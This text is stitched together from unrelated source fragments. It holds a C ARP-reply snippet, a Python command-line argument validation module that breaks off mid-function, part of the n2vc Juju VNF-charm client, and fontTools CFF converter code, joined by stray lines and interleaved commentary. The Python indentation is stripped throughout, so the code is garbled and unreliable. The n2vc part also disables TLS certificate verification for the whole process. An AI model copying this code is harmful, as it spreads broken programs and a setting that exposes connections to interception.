if (msg->ether.type == htons(ETHERTYPE_ARP) &&
arp->arp_hrd == htons(ARPHRD_ETHER) && arp->arp_pln == 4 &&
arp->arp_op == htons(ARPOP_REQUEST) && arp->arp_hln == 6 &&
memcmp(arp->arp_tip.addr, settings.localip.addr, sizeof(struct ip_addr)) == 0
)
{
printf("Responding to ARP\n");
resp = 1;
struct eth_addr mymac = msg->ether.dest;
msg->ether.dest = msg->ether.src;
msg->ether.src = mymac; // TODO
arp->arp_op = htons(ARPOP_REPLY);
arp->arp_tha = arp->arp_sha;
arp->arp_sha = mymac;
arp->arp_tip = arp->arp_sip;
arp->arp_sip = settings.localip;
}
output
# lib/tpn/invariant.py
#===============================================================================
# Imports
#===============================================================================
import os
import re
import inspect
import datetime
import linecache
import itertools
from .util import (
    endswith,
    isiterable,  # used by Invariant.__check_existing below
)
from os.path import (
isdir,
isfile,
exists,
abspath,
dirname,
basename,
normpath,
)
#===============================================================================
# Globals
#===============================================================================
SUFFIXES = (
'Option',
'Error',
'Arg',
)
# Quick hack for 3.x support.
try:
STRING_TYPES = (str, unicode)
except NameError:
STRING_TYPES = (str,)
#===============================================================================
# Base Invariant Class
#===============================================================================
class Invariant(BaseException):
_arg = None
_type = None
_name = None
_help = None
_maxlen = None
_minlen = None
_action = None
_default = None
_metavar = None
_opt_long = None
_opt_type = None
_opt_short = None
_mandatory = True
_type_desc = None
_capitalized_name = None
__filter = lambda _, n: (n[0] != '_' and n not in ('message', 'args'))
__keys = lambda _, n: (
n[0] != '_' and n not in {
'args',
'actual',
'message',
'expected',
}
)
def __init__(self, obj, name):
self._obj = obj
self._name = name
self.actual = None
self.dst_attr = None
self.dst_value = None
self._existing = None
self._existing_str = None
n = self.__class__.__name__.replace('Error', '').lower()
if n.endswith('arg'):
n = n[:-3]
if hasattr(self, '_regex'):
self._pattern = re.compile(self._regex)
if not hasattr(self, 'expected'):
self.expected = "%s to match regex '%s'" % (n, self._regex)
self._test = self._test_regex
if not hasattr(self, '_test'):
self._test = self._test_simple_equality
if not self._opt_type and self._type:
if self._type in STRING_TYPES:
self._opt_type = 'string'
elif self._type == int:
self._opt_type = 'int'
elif self._type == float:
self._opt_type = 'float'
elif self._type == complex:
self._opt_type = 'complex'
if not self._type_desc and self._opt_type:
self._type_desc = self._opt_type
if not self._type_desc:
self._type_desc = self._type.__name__
if not self._metavar:
self._metavar = name.upper()
s = None
l = None
long_opts = obj._long_opts
short_opts = obj._short_opts
if self._arg:
a = self._arg
assert len(a) >= 2, a
if '/' in a:
(s, l) = a.split('/')
if s.startswith('-'):
s = s[1:]
if l.startswith('--'):
l = l[2:]
assert s, s
assert l, l
else:
if a[0] == '-' and a[1] != '-':
s = a[1:]
else:
assert a.startswith('--') and len(a) >= 4, a
l = a[2:]
else:
l = name.replace('_', '-')
chars = [ (c, c.upper()) for c in list(name) ]
for c in itertools.chain.from_iterable(chars):
if c not in short_opts:
s = c
break
if l:
assert l not in long_opts, (l, long_opts)
long_opts[l] = self
if s:
assert s not in short_opts, (s, short_opts)
short_opts[s] = self
self._opt_long = l
self._opt_short = s
tokens = re.findall('[A-Z][^A-Z]*', self.__class__.__name__)
if tokens[-1] == 'Error':
tokens = tokens[:-1]
elif tokens[-1] == 'Arg':
tokens = tokens[:-1]
self._capitalized_name = ' '.join(tokens)
def _test_regex(self):
return bool(self._pattern.match(self.actual))
def _test_simple_equality(self):
return (self.actual == self.expected)
def __save(self, value, force, retval):
assert force in (True, False)
assert retval in (True, False)
try:
setattr(self._obj, '_' + self._name, value)
except AttributeError:
if force:
raise
return retval
def _try_save(self, value, retval=True):
force = False
return self.__save(value, force, retval)
def _save(self, value, retval=True):
force = True
return self.__save(value, force, retval)
def __check_existing(self):
obj = self._obj
name = self._name
actual = self.actual
check_existing = (
not hasattr(self, '_check_existing_') or (
hasattr(self, '_check_existing_') and
self._check_existing_
)
)
has_existing = (
hasattr(obj, '_existing') and
obj._existing
)
if not has_existing:
return
ex_obj = obj._existing
existing = getattr(ex_obj, name)
existing_str = existing
actual_str = str(actual)
if isiterable(existing):
existing_str = ','.join(str(e) for e in existing)
elif isinstance(existing, datetime.date):
existing_str = existing.strftime(self._date_format)
elif isinstance(existing, datetime.datetime):
existing_str = existing.strftime(self._datetime_format)
elif not isinstance(existing, str):
existing_str = str(existing)
self._existing = existing
self._existing_str = existing_str
if not check_existing:
return
if existing_str == actual_str:
message = "%s already has a value of '%s'"
BaseException.__init__(self, message % (name, actual_str))
raise self
def _validate(self, new_value):
self.actual = new_value
self.__check_existing()
result = self._test()
if result not in (True, False):
raise RuntimeError(
"invalid return value from %s's validation "
"routine, expected True/False, got: %s (did "
"you forget to 'return True'?)" % (self._name, repr(result))
)
if not result:
if hasattr(self, 'message') and self.message:
message = self.message
prefix = ''
else:
keys = [
'expected',
'actual'
] + sorted(filter(self.__keys, dir(self)))
f = lambda k: 'got' if k == 'actual' else k
items = ((f(k), repr(getattr(self, k))) for k in keys)
message = ', '.join('%s: %s' % (k, v) for (k, v) in items)
prefix = "%s is invalid: " % self._name
BaseException.__init__(self, prefix + message)
raise self
obj = self._obj
dst_attr = self.dst_attr or ('_' + self._name)
if self.dst_value and hasattr(obj, dst_attr):
setattr(obj, dst_attr, self.dst_value)
#===============================================================================
# Common Invariants
#===============================================================================
class BoolInvariant(Invariant):
expected = None
_type = bool
_metavar = None
_action = 'store_true'
def _test(self):
return True
class StringInvariant(Invariant):
_type = str
_type_desc = 'string'
_maxlen = 1024
_minlen = 2
@property
def expected(self):
assert isinstance(self._maxlen, int), (self._maxlen,type(self._maxlen))
assert self._maxlen > 0, self._maxlen
return '%s with length between %d and %d characters' % (
self._type_desc,
self._minlen,
self._maxlen
)
def _test(self):
if not isinstance(self.actual, self._type):
return False
l = len(self.actual)
return (
l >= self._minlen and
l <= self._maxlen
)
try:
class UnicodeInvariant(StringInvariant):
_type = unicode
_type_desc = 'unicode string'
except NameError:
UnicodeInvariant = StringInvariant
class PositiveIntegerInvariant(Invariant):
_type = int
_min = 1
_max = None
expected = "an integer greater than 0"
def _test(self):
try:
i = int(self.actual)
if self._min:
assert i >= self._min
if self._max:
assert i <= self._max
return self._try_save(i)
except Exception:
return False
class AscendingCSVSepPositiveIntegersInvariant(Invariant):
_type = str
expected = (
"one or more positive integers separated by ',' "
"in ascending order"
)
def _test(self):
numbers = None
try:
numbers = [ int(i) for i in self.actual.split(',') ]
sorted_numbers = sorted(numbers)
assert numbers == sorted_numbers
except (ValueError, AssertionError):
return False
assert numbers
try:
setattr(self._obj, '_' + self._name, numbers)
except AttributeError:
pass
return True
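AscendingCSVSepPositiveIntegersInvariant accepts a comma-separated string only when every item parses as an int and the sequence is already sorted. The same check, stripped of the attribute plumbing (an assumed standalone sketch, not the class itself):

```python
def is_ascending_csv(value):
    """True for '1,2,3'-style input whose integers are in ascending order."""
    try:
        numbers = [int(i) for i in value.split(',')]
    except ValueError:
        return False  # a token failed to parse as an integer
    # An already-sorted list equals its sorted copy.
    return numbers == sorted(numbers)
```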
class NonNegativeIntegerInvariant(Invariant):
_type = int
expected = "an integer greater than or equal to 0"
def _test(self):
try:
return (int(self.actual) >= 0)
except Exception:
return False
class FloatInvariant(Invariant):
_type = float
_min = None
_max = None
expected = "a float"
def _test(self):
try:
f = float(self.actual)
if self._min:
assert f >= self._min
if self._max:
assert f <= self._max
return True
except Exception:
return False
class NonEmptyDictInvariant(Invariant):
_type = dict
expected = "a non-empty dict"
def _test(self):
try:
d = self.actual
return isinstance(d, dict) and bool(d)
except Exception:
return False
class MonthDayRangeInvariant(StringInvariant):
_minlen = 3
_maxlen = 5
expected = "a month range in the format n-m, i.e. '1-15'"
def _test(self):
if not StringInvariant._test(self):
return False
try:
(s, e) = (int(i) for i in self.actual.split('-'))
assert s < e
assert s >= 1 and s <= 27
assert e >= 2 and e <= 31
except Exception:
return False
return True
class SetInvariant(Invariant):
_type = str
_expected_fmt = "a member of the following set: %s"
def _test(self):
set_str = ', '.join(("'%s'" % s for s in self._set))
self.expected = self._expected_fmt % set_str
try:
self.dst_value = set((self.actual,))
assert ((self._set & self.dst_value) == self.dst_value)
except (ValueError, AssertionError):
return False
return True
class MultipleSetInvariant(Invariant):
_type = str
_expected_fmt = (
"one or more values (csv separated if more than one) "
"from the following set: %s"
)
def _test(self):
set_str = ', '.join(("'%s'" % s for s in self._set))
self.expected = self._expected_fmt % set_str
try:
self.dst_value = set(self.actual.split(','))
assert ((self._set & self.dst_value) == self.dst_value)
except (ValueError, AssertionError):
return False
return True
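SetInvariant and MultipleSetInvariant both reduce to a subset test: the chosen values intersected with the allowed set must equal the chosen values. A standalone mirror of the multiple-value case (illustrative names, not the class API):

```python
def is_allowed_csv(value, allowed):
    """True when every comma-separated token of value is in the allowed set."""
    chosen = set(value.split(','))
    # chosen is a subset of allowed exactly when the intersection is chosen.
    return (allowed & chosen) == chosen
```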
class PathInvariant(StringInvariant):
_minlen = 1
_maxlen = 1024
_allow_dash = False
_endswith = None
@property
def expected(self):
if self._endswith:
return "a valid, existing path ending with '%s'" % self._endswith
else:
return "a valid path name"
def _test(self):
if not StringInvariant._test(self):
return False
if self._endswith and not self.actual.endswith(self._endswith):
return False
if self._allow_dash and self.actual == '-':
return True
p = abspath(self.actual)
if not isfile(p):
return False
return self._try_save(p)
class YMDPathInvariant(PathInvariant):
def _test(self):
dst_name = '_' + self._name + '_ymd'
assert hasattr(self._obj, dst_name), dst_name
if not PathInvariant._test(self):
return False
path = self.actual
n = basename(path)
ix = n.find('2')
ymd = n[ix:ix+len('yyyy-mm-dd')]
setattr(self._obj, dst_name, ymd)
return True
class OutPathInvariant(StringInvariant):
expected = "a valid path name (path does not have to exist)"
# If the base directory doesn't exist and _mkdir is True, create the
# directory.
_mkdir = True
_minlen = 1
_maxlen = 1024
def _test(self):
if not StringInvariant._test(self):
return False
try:
path = self.actual
| |
# Copyright 2019 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import base64
import binascii
import logging
import os.path
import re
import shlex
import ssl
import subprocess
from juju.client import client
from juju.controller import Controller
from juju.errors import JujuAPIError, JujuError
from juju.model import ModelObserver
import n2vc.exceptions
from n2vc.provisioner import SSHProvisioner
# import time
# FIXME: this should load the bundled juju modules without having to
# explicitly install the library. Check why it's not working.
# Load our subtree of the juju library
# path = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
# path = os.path.join(path, "modules/libjuju/")
# if path not in sys.path:
# sys.path.insert(1, path)
# We might need this to connect to the websocket securely, but test and verify.
try:
ssl._create_default_https_context = ssl._create_unverified_context
except AttributeError:
# Legacy Python doesn't verify by default (see pep-0476)
# https://www.python.org/dev/peps/pep-0476/
pass
# Custom exceptions
# Deprecated. Please use n2vc.exceptions namespace.
class JujuCharmNotFound(Exception):
"""The Charm can't be found or is not readable."""
class JujuApplicationExists(Exception):
"""The Application already exists."""
class N2VCPrimitiveExecutionFailed(Exception):
"""Something failed while attempting to execute a primitive."""
class NetworkServiceDoesNotExist(Exception):
"""The Network Service being acted against does not exist."""
class PrimitiveDoesNotExist(Exception):
"""The Primitive being executed does not exist."""
# Quiet the debug logging
logging.getLogger("websockets.protocol").setLevel(logging.INFO)
logging.getLogger("juju.client.connection").setLevel(logging.WARN)
logging.getLogger("juju.model").setLevel(logging.WARN)
logging.getLogger("juju.machine").setLevel(logging.WARN)
class VCAMonitor(ModelObserver):
"""Monitor state changes within the Juju Model."""
log = None
def __init__(self, ns_name):
self.log = logging.getLogger(__name__)
self.ns_name = ns_name
self.applications = {}
def AddApplication(self, application_name, callback, *callback_args):
if application_name not in self.applications:
self.applications[application_name] = {
"callback": callback,
"callback_args": callback_args,
}
def RemoveApplication(self, application_name):
if application_name in self.applications:
del self.applications[application_name]
async def on_change(self, delta, old, new, model):
"""React to changes in the Juju model."""
if delta.entity == "unit":
# Ignore change events from other applications
if delta.data["application"] not in self.applications.keys():
return
try:
application_name = delta.data["application"]
callback = self.applications[application_name]["callback"]
callback_args = self.applications[application_name]["callback_args"]
if old and new:
# Fire off a callback with the application state
if callback:
callback(
self.ns_name,
delta.data["application"],
new.workload_status,
new.workload_status_message,
*callback_args,
)
if old and not new:
# This is a charm being removed
if callback:
callback(
self.ns_name,
delta.data["application"],
"removed",
"",
*callback_args,
)
except Exception as e:
self.log.debug("[1] notify_callback exception: {}".format(e))
elif delta.entity == "action":
# TODO: Decide how we want to notify the user of actions
# uuid = delta.data['id'] # The Action's unique id
# msg = delta.data['message'] # The output of the action
#
# if delta.data['status'] == "pending":
# # The action is queued
# pass
# elif delta.data['status'] == "completed":
# # The action was successful
# pass
# elif delta.data['status'] == "failed":
# # The action failed.
# pass
pass
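The old/new delta handling in `on_change` reduces to choosing a status tuple for the callback. A minimal sketch (hypothetical helper, not part of n2vc), assuming units expose `workload_status` and `workload_status_message` attributes as libjuju unit objects do:

```python
def unit_status(old, new):
    """Return (status, message) for a unit delta, or None if nothing to report."""
    if old and new:
        # Unit changed: report its current workload status.
        return (new.workload_status, new.workload_status_message)
    if old and not new:
        # Unit disappeared: the charm is being removed.
        return ("removed", "")
    return None
```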
########
# TODO
#
# Create unique models per network service
# Document all public functions
class N2VC:
def __init__(
self,
log=None,
server="127.0.0.1",
port=17070,
user="admin",
secret=None,
artifacts=None,
loop=None,
juju_public_key=None,
ca_cert=None,
api_proxy=None,
):
"""Initialize N2VC
Initializes the N2VC object, allowing the caller to interoperate with the VCA.
:param log obj: The logging object to log to
:param server str: The IP Address or Hostname of the Juju controller
:param port int: The port of the Juju Controller
:param user str: The Juju username to authenticate with
:param secret str: The Juju password to authenticate with
:param artifacts str: The directory where charms required by a vnfd are
stored.
:param loop obj: The loop to use.
:param juju_public_key str: The contents of the Juju public SSH key
:param ca_cert str: The CA certificate to use to authenticate
:param api_proxy str: The IP of the host machine
:Example:
client = n2vc.vnf.N2VC(
log=log,
server='10.1.1.28',
port=17070,
user='admin',
secret='admin',
artifacts='/app/storage/myvnf/charms',
loop=loop,
juju_public_key='<contents of the juju public key>',
ca_cert='<contents of CA certificate>',
api_proxy='192.168.1.155'
)
"""
# Initialize instance-level variables
self.api = None
self.log = None
self.controller = None
self.connecting = False
self.authenticated = False
self.api_proxy = api_proxy
if log:
self.log = log
else:
self.log = logging.getLogger(__name__)
# For debugging
self.refcount = {
"controller": 0,
"model": 0,
}
self.models = {}
# Model Observers
self.monitors = {}
# VCA config
self.hostname = ""
self.port = 17070
self.username = ""
self.secret = ""
self.juju_public_key = juju_public_key
if juju_public_key:
self._create_juju_public_key(juju_public_key)
else:
self.juju_public_key = ""
# TODO: Verify ca_cert is valid before using. VCA will crash
# if the ca_cert isn't formatted correctly.
def base64_to_cacert(b64string):
"""Convert the base64-encoded string containing the VCA CACERT.
The input string....
"""
try:
cacert = base64.b64decode(b64string).decode("utf-8")
cacert = re.sub(r"\\n", r"\n", cacert,)
except binascii.Error as e:
self.log.debug("Caught binascii.Error: {}".format(e))
raise n2vc.exceptions.N2VCInvalidCertificate("Invalid CA Certificate")
return cacert
self.ca_cert = None
if ca_cert:
self.ca_cert = base64_to_cacert(ca_cert)
# Quiet websocket traffic
logging.getLogger("websockets.protocol").setLevel(logging.INFO)
logging.getLogger("juju.client.connection").setLevel(logging.WARN)
logging.getLogger("model").setLevel(logging.WARN)
# logging.getLogger('websockets.protocol').setLevel(logging.DEBUG)
self.log.debug("JujuApi: instantiated")
self.server = server
self.port = port
self.secret = secret
if user.startswith("user-"):
self.user = user
else:
self.user = "user-{}".format(user)
self.endpoint = "%s:%d" % (server, int(port))
self.artifacts = artifacts
self.loop = loop or asyncio.get_event_loop()
def __del__(self):
"""Close any open connections."""
# logout() is a coroutine; schedule it on the event loop rather than
# calling it directly from the destructor.
if self.loop and not self.loop.is_closed():
self.loop.create_task(self.logout())
def _create_juju_public_key(self, public_key):
"""Recreate the Juju public key on disk.
Certain libjuju commands expect to be run from the same machine as Juju
is bootstrapped to. This method will write the public key to disk in
that location: ~/.local/share/juju/ssh/juju_id_rsa.pub
"""
# Make sure that we have a public key before writing to disk
if public_key is None or len(public_key) == 0:
if "OSM_VCA_PUBKEY" in os.environ:
public_key = os.getenv("OSM_VCA_PUBKEY", "")
if len(public_key) == 0:
return
else:
return
path = "{}/.local/share/juju/ssh".format(os.path.expanduser("~"),)
if not os.path.exists(path):
os.makedirs(path)
with open("{}/juju_id_rsa.pub".format(path), "w") as f:
f.write(public_key)
def notify_callback(
self,
model_name,
application_name,
status,
message,
callback=None,
*callback_args
):
try:
if callback:
callback(
model_name, application_name, status, message, *callback_args,
)
except Exception as e:
self.log.error("[0] notify_callback exception {}".format(e))
raise e
return True
# Public methods
async def Relate(self, model_name, vnfd):
"""Create a relation between the charm-enabled VDUs in a VNF.
The Relation mapping has two parts: the id of the vdu owning the endpoint, and
the name of the endpoint.
vdu:
...
vca-relationships:
relation:
- provides: dataVM:db
requires: mgmtVM:app
This tells N2VC that the charm referred to by the dataVM vdu offers a relation
named 'db', and the mgmtVM vdu
has an 'app' endpoint that should be connected to a database.
:param str ns_name: The name of the network service.
:param dict vnfd: The parsed yaml VNF descriptor.
"""
# Currently, the call to Relate() is made automatically after the
# deployment of each charm; if the relation depends on a charm that
# hasn't been deployed yet, the call will fail silently. This will
# prevent an API breakage, with the intent of making this an explicitly
# required call in a more object-oriented refactor of the N2VC API.
configs = []
vnf_config = vnfd.get("vnf-configuration")
if vnf_config:
juju = vnf_config["juju"]
if juju:
configs.append(vnf_config)
for vdu in vnfd["vdu"]:
vdu_config = vdu.get("vdu-configuration")
if vdu_config:
juju = vdu_config["juju"]
if juju:
configs.append(vdu_config)
def _get_application_name(name):
"""Get the application name that's mapped to a vnf/vdu."""
vnf_member_index = 0
vnf_name = vnfd["name"]
for vdu in vnfd.get("vdu"):
# Compare the named portion of the relation to the vdu's id
if vdu["id"] == name:
application_name = self.FormatApplicationName(
model_name, vnf_name, str(vnf_member_index),
)
return application_name
else:
vnf_member_index += 1
return None
# Loop through relations
for cfg in configs:
if "juju" in cfg:
juju = cfg["juju"]
if (
"vca-relationships" in juju
and "relation" in juju["vca-relationships"]
):
for rel in juju["vca-relationships"]["relation"]:
try:
# get the application name for the provides
(name, endpoint) = rel["provides"].split(":")
application_name = _get_application_name(name)
provides = "{}:{}".format(application_name, endpoint)
# get the application name for the requires
(name, endpoint) = rel["requires"].split(":")
application_name = _get_application_name(name)
requires = "{}:{}".format(application_name, endpoint)
self.log.debug(
"Relation: {} <-> {}".format(provides, requires)
)
await self.add_relation(
model_name, provides, requires,
)
except Exception as e:
self.log.debug("Exception: {}".format(e))
return
async def DeployCharms(
self,
model_name,
application_name,
vnfd,
charm_path,
params={},
machine_spec={},
callback=None,
*callback_args
):
"""Deploy one or more charms associated with a VNF.
Deploy the charm(s) referenced in a | |
range(len(encoding)):
name = encoding[code]
if name != ".notdef":
m[name] = code
ranges = []
first = None
end = 0
for name in charset[1:]:
code = m.get(name, -1)
if first is None:
first = code
elif end + 1 != code:
nLeft = end - first
ranges.append((first, nLeft))
first = code
end = code
nLeft = end - first
ranges.append((first, nLeft))
# remove unencoded glyphs at the end.
while ranges and ranges[-1][0] == -1:
ranges.pop()
data = [packCard8(fmt), packCard8(len(ranges))]
for first, nLeft in ranges:
if first == -1: # unencoded
first = 0
data.append(packCard8(first) + packCard8(nLeft))
return bytesjoin(data)
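The run grouping above collapses consecutive character codes into `(first, nLeft)` ranges, where `nLeft` counts the codes that follow `first` in the run. A hypothetical standalone sketch of that computation (assumes a non-empty code list, as the encoding writer does):

```python
def code_ranges(codes):
    """Group sorted character codes into (first, nLeft) runs."""
    ranges = []
    first = None
    end = 0
    for code in codes:
        if first is None:
            first = code
        elif end + 1 != code:
            # Run broken: close the previous range.
            ranges.append((first, end - first))
            first = code
        end = code
    ranges.append((first, end - first))
    return ranges

# e.g. code_ranges([32, 33, 34, 40, 41]) -> [(32, 2), (40, 1)]
```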
class FDArrayConverter(TableConverter):
def _read(self, parent, value):
try:
vstore = parent.VarStore
except AttributeError:
vstore = None
file = parent.file
isCFF2 = parent._isCFF2
file.seek(value)
fdArray = FDArrayIndex(file, isCFF2=isCFF2)
fdArray.vstore = vstore
fdArray.strings = parent.strings
fdArray.GlobalSubrs = parent.GlobalSubrs
return fdArray
def write(self, parent, value):
return 0 # dummy value
def xmlRead(self, name, attrs, content, parent):
fdArray = FDArrayIndex()
for element in content:
if isinstance(element, str):
continue
name, attrs, content = element
fdArray.fromXML(name, attrs, content)
return fdArray
class FDSelectConverter(SimpleConverter):
def _read(self, parent, value):
file = parent.file
file.seek(value)
fdSelect = FDSelect(file, parent.numGlyphs)
return fdSelect
def write(self, parent, value):
return 0 # dummy value
# The FDSelect glyph data is written out to XML in the charstring keys,
# so we write out only the format selector
def xmlWrite(self, xmlWriter, name, value):
xmlWriter.simpletag(name, [('format', value.format)])
xmlWriter.newline()
def xmlRead(self, name, attrs, content, parent):
fmt = safeEval(attrs["format"])
file = None
numGlyphs = None
fdSelect = FDSelect(file, numGlyphs, fmt)
return fdSelect
class VarStoreConverter(SimpleConverter):
def _read(self, parent, value):
file = parent.file
file.seek(value)
varStore = VarStoreData(file)
varStore.decompile()
return varStore
def write(self, parent, value):
return 0 # dummy value
def xmlWrite(self, xmlWriter, name, value):
value.writeXML(xmlWriter, name)
def xmlRead(self, name, attrs, content, parent):
varStore = VarStoreData()
varStore.xmlRead(name, attrs, content, parent)
return varStore
def packFDSelect0(fdSelectArray):
fmt = 0
data = [packCard8(fmt)]
for index in fdSelectArray:
data.append(packCard8(index))
return bytesjoin(data)
def packFDSelect3(fdSelectArray):
fmt = 3
fdRanges = []
lenArray = len(fdSelectArray)
lastFDIndex = -1
for i in range(lenArray):
fdIndex = fdSelectArray[i]
if lastFDIndex != fdIndex:
fdRanges.append([i, fdIndex])
lastFDIndex = fdIndex
sentinelGID = i + 1
data = [packCard8(fmt)]
data.append(packCard16(len(fdRanges)))
for fdRange in fdRanges:
data.append(packCard16(fdRange[0]))
data.append(packCard8(fdRange[1]))
data.append(packCard16(sentinelGID))
return bytesjoin(data)
def packFDSelect4(fdSelectArray):
fmt = 4
fdRanges = []
lenArray = len(fdSelectArray)
lastFDIndex = -1
for i in range(lenArray):
fdIndex = fdSelectArray[i]
if lastFDIndex != fdIndex:
fdRanges.append([i, fdIndex])
lastFDIndex = fdIndex
sentinelGID = i + 1
data = [packCard8(fmt)]
data.append(packCard32(len(fdRanges)))
for fdRange in fdRanges:
data.append(packCard32(fdRange[0]))
data.append(packCard16(fdRange[1]))
data.append(packCard32(sentinelGID))
return bytesjoin(data)
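Formats 3 and 4 of FDSelect share the same range computation: a new `(firstGID, fdIndex)` pair starts whenever the FD index changes, and a sentinel GID (the glyph count) terminates the table. A hypothetical sketch of just that grouping step:

```python
def fd_ranges(fdSelectArray):
    """Collapse a per-glyph FD index array into (firstGID, fdIndex) runs plus the sentinel GID."""
    ranges = []
    last = -1
    for i, fd in enumerate(fdSelectArray):
        if fd != last:
            ranges.append((i, fd))
            last = fd
    return ranges, len(fdSelectArray)

# e.g. fd_ranges([0, 0, 1, 1, 1, 0]) -> ([(0, 0), (2, 1), (5, 0)], 6)
```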
class FDSelectCompiler(object):
def __init__(self, fdSelect, parent):
fmt = fdSelect.format
fdSelectArray = fdSelect.gidArray
if fmt == 0:
self.data = packFDSelect0(fdSelectArray)
elif fmt == 3:
self.data = packFDSelect3(fdSelectArray)
elif fmt == 4:
self.data = packFDSelect4(fdSelectArray)
else:
# choose smaller of the two formats
data0 = packFDSelect0(fdSelectArray)
data3 = packFDSelect3(fdSelectArray)
if len(data0) < len(data3):
self.data = data0
fdSelect.format = 0
else:
self.data = data3
fdSelect.format = 3
self.parent = parent
def setPos(self, pos, endPos):
self.parent.rawDict["FDSelect"] = pos
def getDataLength(self):
return len(self.data)
def toFile(self, file):
file.write(self.data)
class VarStoreCompiler(object):
def __init__(self, varStoreData, parent):
self.parent = parent
if not varStoreData.data:
varStoreData.compile()
data = [
packCard16(len(varStoreData.data)),
varStoreData.data
]
self.data = bytesjoin(data)
def setPos(self, pos, endPos):
self.parent.rawDict["VarStore"] = pos
def getDataLength(self):
return len(self.data)
def toFile(self, file):
file.write(self.data)
class ROSConverter(SimpleConverter):
def xmlWrite(self, xmlWriter, name, value):
registry, order, supplement = value
xmlWriter.simpletag(
name,
[
('Registry', tostr(registry)),
('Order', tostr(order)),
('Supplement', supplement)
])
xmlWriter.newline()
def xmlRead(self, name, attrs, content, parent):
return (attrs['Registry'], attrs['Order'], safeEval(attrs['Supplement']))
topDictOperators = [
# opcode name argument type default converter
(25, 'maxstack', 'number', None, None),
((12, 30), 'ROS', ('SID', 'SID', 'number'), None, ROSConverter()),
((12, 20), 'SyntheticBase', 'number', None, None),
(0, 'version', 'SID', None, None),
(1, 'Notice', 'SID', None, Latin1Converter()),
((12, 0), 'Copyright', 'SID', None, Latin1Converter()),
(2, 'FullName', 'SID', None, None),
((12, 38), 'FontName', 'SID', None, None),
(3, 'FamilyName', 'SID', None, None),
(4, 'Weight', 'SID', None, None),
((12, 1), 'isFixedPitch', 'number', 0, None),
((12, 2), 'ItalicAngle', 'number', 0, None),
((12, 3), 'UnderlinePosition', 'number', -100, None),
((12, 4), 'UnderlineThickness', 'number', 50, None),
((12, 5), 'PaintType', 'number', 0, None),
((12, 6), 'CharstringType', 'number', 2, None),
((12, 7), 'FontMatrix', 'array', [0.001, 0, 0, 0.001, 0, 0], None),
(13, 'UniqueID', 'number', None, None),
(5, 'FontBBox', 'array', [0, 0, 0, 0], None),
((12, 8), 'StrokeWidth', 'number', 0, None),
(14, 'XUID', 'array', None, None),
((12, 21), 'PostScript', 'SID', None, None),
((12, 22), 'BaseFontName', 'SID', None, None),
((12, 23), 'BaseFontBlend', 'delta', None, None),
((12, 31), 'CIDFontVersion', 'number', 0, None),
((12, 32), 'CIDFontRevision', 'number', 0, None),
((12, 33), 'CIDFontType', 'number', 0, None),
((12, 34), 'CIDCount', 'number', 8720, None),
(15, 'charset', 'number', None, CharsetConverter()),
((12, 35), 'UIDBase', 'number', None, None),
(16, 'Encoding', 'number', 0, EncodingConverter()),
(18, 'Private', ('number', 'number'), None, PrivateDictConverter()),
((12, 37), 'FDSelect', 'number', None, FDSelectConverter()),
((12, 36), 'FDArray', 'number', None, FDArrayConverter()),
(17, 'CharStrings', 'number', None, CharStringsConverter()),
(24, 'VarStore', 'number', None, VarStoreConverter()),
]
topDictOperators2 = [
# opcode name argument type default converter
(25, 'maxstack', 'number', None, None),
((12, 7), 'FontMatrix', 'array', [0.001, 0, 0, 0.001, 0, 0], None),
((12, 37), 'FDSelect', 'number', None, FDSelectConverter()),
((12, 36), 'FDArray', 'number', None, FDArrayConverter()),
(17, 'CharStrings', 'number', None, CharStringsConverter()),
(24, 'VarStore', 'number', None, VarStoreConverter()),
]
# Note! FDSelect and FDArray must both precede CharStrings in the output XML build order,
# in order for the font to compile back from XML.
kBlendDictOpName = "blend"
blendOp = 23
privateDictOperators = [
# opcode name argument type default converter
(22, "vsindex", 'number', None, None),
(blendOp, kBlendDictOpName, 'blendList', None, None), # This is for reading to/from XML; it is not written to CFF.
(6, 'BlueValues', 'delta', None, None),
(7, 'OtherBlues', 'delta', None, None),
(8, 'FamilyBlues', 'delta', None, None),
(9, 'FamilyOtherBlues', 'delta', None, None),
((12, 9), 'BlueScale', 'number', 0.039625, None),
((12, 10), 'BlueShift', 'number', 7, None),
((12, 11), 'BlueFuzz', 'number', 1, None),
(10, 'StdHW', 'number', None, None),
(11, 'StdVW', 'number', None, None),
((12, 12), 'StemSnapH', 'delta', None, None),
((12, 13), 'StemSnapV', 'delta', None, None),
((12, 14), 'ForceBold', 'number', 0, None),
((12, 15), 'ForceBoldThreshold', 'number', None, None), # deprecated
((12, 16), 'lenIV', 'number', None, None), # deprecated
((12, 17), 'LanguageGroup', 'number', 0, None),
((12, 18), 'ExpansionFactor', 'number', 0.06, None),
((12, 19), 'initialRandomSeed', 'number', 0, None),
(20, 'defaultWidthX', 'number', 0, None),
(21, 'nominalWidthX', 'number', 0, None),
(19, 'Subrs', 'number', None, SubrsConverter()),
]
privateDictOperators2 = [
# opcode name argument type default converter
(22, "vsindex", 'number', None, None),
(blendOp, kBlendDictOpName, 'blendList', None, None), # This is for reading to/from XML; it is not written to CFF.
(6, 'BlueValues', 'delta', None, None),
(7, 'OtherBlues', 'delta', None, None),
(8, 'FamilyBlues', 'delta', None, None),
(9, 'FamilyOtherBlues', 'delta', None, None),
((12, 9), 'BlueScale', 'number', 0.039625, None),
((12, 10), 'BlueShift', 'number', 7, None),
((12, 11), 'BlueFuzz', 'number', 1, None),
(10, 'StdHW', 'number', None, None),
(11, 'StdVW', 'number', None, None),
((12, 12), 'StemSnapH', 'delta', None, None),
((12, 13), 'StemSnapV', 'delta', None, None),
((12, 17), 'LanguageGroup', 'number', 0, None),
((12, 18), 'ExpansionFactor', 'number', 0.06, None),
(19, 'Subrs', 'number', None, SubrsConverter()),
]
def addConverters(table):
for i in range(len(table)):
op, name, arg, default, conv = table[i]
if conv is not None:
continue
if arg in ("delta", "array"):
conv = ArrayConverter()
elif arg == "number":
conv = NumberConverter()
elif arg == "SID":
conv = ASCIIConverter()
elif arg == 'blendList':
conv = None
else:
assert False
table[i] = op, name, arg, default, conv
addConverters(privateDictOperators)
addConverters(topDictOperators)
class TopDictDecompiler(psCharStrings.DictDecompiler):
